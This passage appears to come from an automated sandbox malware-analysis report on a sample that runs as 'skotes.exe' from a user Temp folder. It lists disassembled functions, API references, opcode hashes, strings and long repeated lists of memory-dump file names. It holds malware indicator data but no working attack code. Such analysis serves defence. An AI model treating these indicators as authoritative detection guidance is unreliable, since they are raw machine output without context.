                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3281396844-0
                                                                                                                                                                                                                                          • Opcode ID: e54d22f4ee979e76a70a19909b53c15c8e6d6305873fd619e0c6e8191b632c15
                                                                                                                                                                                                                                          • Instruction ID: 9f4c2b250e9ae1f64da136d4b1e9c40ee710e8f81bf6db30b7ceb1b25ba6012e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e54d22f4ee979e76a70a19909b53c15c8e6d6305873fd619e0c6e8191b632c15
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 833186B2901256DFCB50EFA4C5816EDBBB6BF05308F28007ED80127242CF31AD84CB99
                                                                                                                                                                                                                                          Function 006C182A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006C18A4
                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 006C18EB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pContext
                                                                                                                                                                                                                                          • API String ID: 3390424672-2046700901
                                                                                                                                                                                                                                          • Opcode ID: 8da8468f0bd94e65718a0ef299205c255f97352cef4dae213f0574cf085ca712
                                                                                                                                                                                                                                          • Instruction ID: c52535b7508d957dca77daec0895ecdfaf9d97c45851870c7a108f8901623b3b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8da8468f0bd94e65718a0ef299205c255f97352cef4dae213f0574cf085ca712
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D21F335B056159BCB14AB68C895FBCB3A7FF97324B04012EE5018F2D2CBA4ED428A94
                                                                                                                                                                                                                                          Function 006CDFE3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • 6l, xrefs: 006CE034
                                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 006CDFE8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 6l$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                          • API String ID: 0-2569784805
                                                                                                                                                                                                                                          • Opcode ID: 744b22ae0be1ff8cb5e0f455c947f3ad033ea986fb53a2c36a56052bc336f15c
                                                                                                                                                                                                                                          • Instruction ID: cb8b1b2667eb00064011e80bb629aa5d5e027214b14d6366106c6f8a53e66124
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 744b22ae0be1ff8cb5e0f455c947f3ad033ea986fb53a2c36a56052bc336f15c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E219F717042096F9B70AE658C85FBB77BFEF00364710461CF92896292EB72EC2186A4
                                                                                                                                                                                                                                          Function 006BAE65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • List.LIBCONCRT ref: 006BAEEA
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006BAF0F
                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 006BAF4E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
